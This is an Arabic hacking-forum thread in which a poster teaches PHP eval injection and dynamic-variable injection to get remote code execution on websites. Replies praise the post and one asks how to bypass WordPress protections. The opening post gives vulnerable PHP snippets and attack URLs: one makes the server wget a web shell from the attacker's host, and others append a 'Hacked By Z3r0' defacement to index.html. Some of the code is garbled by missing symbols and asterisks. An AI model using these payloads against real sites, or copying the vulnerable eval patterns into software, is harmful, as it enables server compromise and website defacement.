التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 06-03-2013, 06:06 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
Injection
:: Interactive Developer ::
 
الصورة الرمزية Injection
 

 

 
إحصائية العضو





Injection غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
Injection is on a distinguished road

افتراضي Dynamic Evaluation Variables | By Z3r0H4xor


السلام عليكم ورحمة الله وبركاتة

سلام يارجالة اخباركم ايه ؟

اليوم بنتكلم عن البحث عن الثغرات في المتغيرات الديناميكية وكلنا نعرف انه لغة بي اتش بي مهمة في الاختراق كثير واكتشاف الثغرات بشكل كبير لنة المخترق يعتمد على ثغره ليخترق موقع معين , ونعرف انه سكربتات معروفة مبرمجة بل بي اتش بي مثل " Wordpress , Mybb, Joomla " استغلال المتغيرات الديناميكة تقدر تقول RCE ( Remote Code Execution التي تسمح بتنفيذ امر معين

كود PHP:
Dynamic Evaluation Variables 
تمام الان نبدا بـ


كود PHP:
Eval Injection 
الـ Eval Injection معروفة بـ RCE لما الهكر يتحكم بل ( String ) وحالة حال eval()


مثال

كود PHP:
$common-variable "command";
 
$x $_GET['arg'];
 eval(
"\$common-variable = \$x;"); 
نفس مانشوف مافيه علامة دولار في المتغير , يمكن ان نتخطاه عبر المدخلات الخاصة

وفي السطر الثاني التطبيق يسمح اننه ندخل واستخدام الـ $ للحصول على الارسال البيانات التطبيق
والخالدم لتنفيذها. ونحن ننظر في السطر الثالث ونشوف eval() وضيفتة يتم استدعاء
وهاذا تنفيذ سلاسل 2 المذكورة فوق وهاذا مثال بسيط عن استغلاله

كود PHP:
<?php
    $cmd
=$_GET['cmd'];
    eval(
$cmd);
    
?>
الاستغلال يحلوين يكون بهاذا الشكل ض1


كود PHP:
http://www.target.com/php-files/input.php?cmd=wget  www.mysite.com/shell.php 
نعرف انه فيه كثير ناس يحبون لغة البي اتش بي هي لفة بسيطة ولكنها قويه

الي تجي معها كثير وضايف , البي اتش بي يدعم المتغيرات وهي المتغيرات او التعيبرات
الي تقيم الى اسماء المتغيرات الاخرى < ~ مجرد تفكير في هاذا , ويقول لي ان لايسبب مشاكل
هذا التعبيرات ممكن استخدامها لتغير حيوي متغير الى يتم الوصول اليها او تععيين اثناء
تنفيذ البرنامج مريحة جدا ولكن فكر مره ثانية وراح يكون التفكير ان هاذا هو
غير امنة اذا لم تتم السيطرة على اسم المتغير او مظهره يمكن للمهاجم قراءة او كتابة
المتغيرات التعسفي مما تسبب حتى الان تنفيذ التعليمات البرمجية بعيد عن اخر .

مثال

كود PHP:
$var**** = "myvar";
 $
$var**** = 10;
 echo 
$myvar
هاذا بيطلب متغير $myvar وبيطبع الـ String عشرة " 10"


كود PHP:
$safevar "Welcome to my site";
 
$param1 "";
 
$param2 "";
 
$param3 "";
 
# my own "register globals" for param[1,2,3]
 
foreach ($_GET as $key => $value) {
    $
$key $value;
    echo 
$value;
 } 
زي مانسشوف الحين الملف يستخدم الطباعة Echo , Print ويطبع عباره " مرحبا بك في موقعي "

طبعا المخترق يقدر يستغل الثغره في متغير $safevar لشيء ثاني ولنقول مثلا
"echo Hacked By Z3r0 >> /home/var/www/public_html/index.html"

وتستغل بهاذي الطريقة

كود PHP:
 http://www.target.com/php-files/input.php?safevar=echo Hacked By  z3r0>> /home/var/www/public_html/index.html 
&


كود PHP:
$function-**** = "myfunction";
 
$Arg1 "hello";
 
$Arg2 "welcome to my site";
 $
$function-****("Arg1""Arg2");
 echo 
$myfunction
طريقة الاستغلال


كود PHP:
  http://www.target.com/php-files/input.php?Arg1=hello&Arg2=echo  Hacked By Z3r0 >>  /home/var/www/public_html/index.html 
انتهينا من الدرس ض1 بس حاب انبهه الي ماعجبة الدرس مايرد ض1


كتبتة لنة الملل سوا فايدة كبيرة خخخخ

grt'z : Dr.Aadil, Mr.Hx , alzh3r, PreStiGe511, Nok511 , All Members



Dynamic Evaluation Variables | By Z3r0H4xor

   

رد مع اقتباس
قديم 06-03-2013, 10:35 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية oblack
 

 

 
إحصائية العضو





oblack غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
oblack is on a distinguished road

افتراضي رد: Dynamic Evaluation Variables | By Z3r0H4xor


درس رائع واتمنى للاستمرار بوضع شروحات متقدمة هل ممكن تعمل لنا دراسة حول سكربت wordpress بشكل بحث مدروس بدقة واسباب الصعوبة بستغلال الثغرات بهذا السكربت حتى نستطيع نتوصل الى طريقة لتخطي الحماايات بيه .

   

رد مع اقتباس
قديم 06-03-2013, 11:23 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية Saad Ghamdi
 

 

 
إحصائية العضو







Saad Ghamdi غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
Saad Ghamdi is on a distinguished road

افتراضي رد: Dynamic Evaluation Variables | By Z3r0H4xor


يعطيك الف عافية درس أكثر من رائع وتشكر عليه
اتمنى نشوف لك شروحات اكثر يامبدع

التوقيع

Don't let idiots ruin your day

 

   

رد مع اقتباس
قديم 07-01-2013, 01:31 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية dahapp
 

 

 
إحصائية العضو





dahapp غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
dahapp is on a distinguished road

افتراضي رد: Dynamic Evaluation Variables | By Z3r0H4xor


مشكوووور

التوقيع

***========================***
إذآ مرٍت الآيام
ولم ترونى
فهذآ موضوعى
فتذكرونى
***=============***

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 05:52 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0